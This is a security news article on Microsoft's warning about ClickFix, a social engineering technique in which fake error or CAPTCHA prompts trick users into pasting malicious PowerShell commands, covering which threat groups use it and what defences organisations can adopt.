Microsoft has issued a direct warning: a social engineering technique called ClickFix is being used by both cybercriminals and state-sponsored actors to trick users into executing malicious commands through Windows Terminal and PowerShell. The attacks are simple, effective, and spreading fast.
The technique isn’t new. But its rapid adoption across multiple threat actor groups — including those linked to North Korea, Iran, and Russia — signals that ClickFix has graduated from a niche trick to a mainstream attack vector. Microsoft’s Threat Intelligence team published findings in March 2025 detailing how the method works and who’s using it, as reported by TechRadar.
Here’s how it works. An attacker presents the victim with a fake error message or verification prompt — often disguised as a CAPTCHA, a browser update notification, or a document rendering error. The prompt instructs the user to open Windows Terminal or the Run dialog and paste a command. That command downloads and executes malware. No exploit needed. No zero-day required. Just a human following instructions.
That’s the part that should concern security teams most. ClickFix bypasses technical defenses by targeting the user directly, turning them into the attack vector. The victim manually executes the payload, which means endpoint detection tools that monitor for automated exploitation can miss the initial compromise entirely.
Microsoft identified multiple threat groups deploying ClickFix between late 2024 and early 2025. The North Korean group Kimsuky (tracked by Microsoft as Emerald Sleet) used fake device registration pages to trick targets into opening PowerShell as an administrator and pasting attacker-provided code. The Iranian group MuddyWater embedded ClickFix lures in phishing emails targeting Middle Eastern organizations. And Russian-linked actors used the technique in campaigns against Ukrainian entities, disguising malicious commands as system updates.
These aren’t amateurs. State-backed groups adopting ClickFix tells you something about its effectiveness.
The technique exploits a fundamental gap in how organizations think about security. Most defensive architectures assume malware arrives through files — attachments, downloads, drive-by exploits. ClickFix sidesteps all of that. The user opens a legitimate system tool, pastes a command, and the system does exactly what it’s told. From the machine’s perspective, this looks like authorized activity. The command might invoke PowerShell to download a script from a remote server, which then installs a backdoor, a remote access trojan, or an infostealer. By the time behavioral detection kicks in, the payload is already running.
According to Proofpoint, ClickFix attacks surged dramatically in the second half of 2024, with the firm tracking campaigns across multiple sectors including healthcare, finance, and government. Proofpoint researchers noted that the technique appeared in campaigns delivering a range of payloads including AsyncRAT, Lumma Stealer, and DarkGate. The diversity of malware families deployed through ClickFix underscores how adaptable the method is — it’s essentially payload-agnostic.
So why is it working so well? Part of the answer is psychological. The fake error messages create urgency. Users believe something is broken and they need to fix it. The instructions look technical enough to feel legitimate but simple enough that a non-technical user can follow them. Copy. Paste. Press Enter. Done.
And the delivery mechanisms are getting more sophisticated. Early ClickFix campaigns relied on compromised websites displaying fake browser update banners. Now attackers are embedding lures in phishing emails, fake CAPTCHA pages, spoofed Microsoft 365 login portals, and even GitHub repositories. BleepingComputer reported on campaigns using fake CAPTCHA verification pages that instructed users to open the Windows Run dialog and paste a command — a technique that proved effective even against users who might otherwise be cautious about email attachments.
The security industry has been slow to respond. Most awareness training still focuses on phishing links and malicious attachments. Few programs explicitly warn users about the danger of pasting commands into system terminals. This is a blind spot.
Microsoft’s own recommendations are straightforward: restrict PowerShell execution policies where possible, monitor for unusual command-line activity, and educate users about this specific social engineering pattern. But execution policies can be bypassed, and command-line monitoring generates enormous volumes of telemetry that many security operations centers aren’t equipped to parse effectively. The education piece is probably the most impactful short-term mitigation, and it’s also the hardest to scale.
There’s a deeper structural problem here. Windows gives ordinary users the ability to open PowerShell and execute arbitrary commands. That’s by design — it’s a feature for administrators and power users. But ClickFix turns that feature into an attack surface. Restricting terminal access for standard users would mitigate the risk significantly, yet most organizations haven’t implemented such controls because they break workflows and generate helpdesk tickets. Security versus usability. The oldest tradeoff in the business.
Some vendors are starting to adapt. Group-IB published research in early 2025 documenting ClickFix campaigns targeting hospitality and travel industries, where attackers impersonated booking platforms to deliver malware through the technique. Their analysis showed that the campaigns achieved higher click-through and execution rates than traditional phishing — a data point that should alarm anyone responsible for organizational security.
The numbers tell the story. Proofpoint observed ClickFix techniques in campaigns targeting tens of thousands of messages across dozens of campaigns in late 2024 alone. Microsoft’s report covers at least four distinct nation-state groups adopting the method within a matter of months. And the barrier to entry for attackers is essentially zero — no exploit development, no vulnerability research, just a convincing fake error message and a one-liner PowerShell command.
This is social engineering at its most efficient. Minimal infrastructure. Maximum impact.
For security leaders, the immediate action items are clear. First, implement application control policies that restrict who can run PowerShell and Windows Terminal. Second, deploy command-line logging and create detection rules for common ClickFix patterns — particularly commands that invoke web requests or download cradles. Third, update security awareness programs to explicitly cover the scenario of pasting commands into system tools. And fourth, assume that some users will fall for it anyway and ensure your post-exploitation detection capabilities are strong enough to catch what happens next.
ClickFix isn’t sophisticated in the traditional sense. It doesn’t exploit software vulnerabilities. It doesn’t require advanced tooling. But it works, and it’s being adopted by some of the most capable threat actors on the planet. That combination — simplicity and effectiveness — is exactly what makes it dangerous. The security industry spent years building defenses against technical exploits. ClickFix reminds us that the weakest link hasn’t changed. It’s still the person sitting at the keyboard.
WebProNews is an iEntry Publication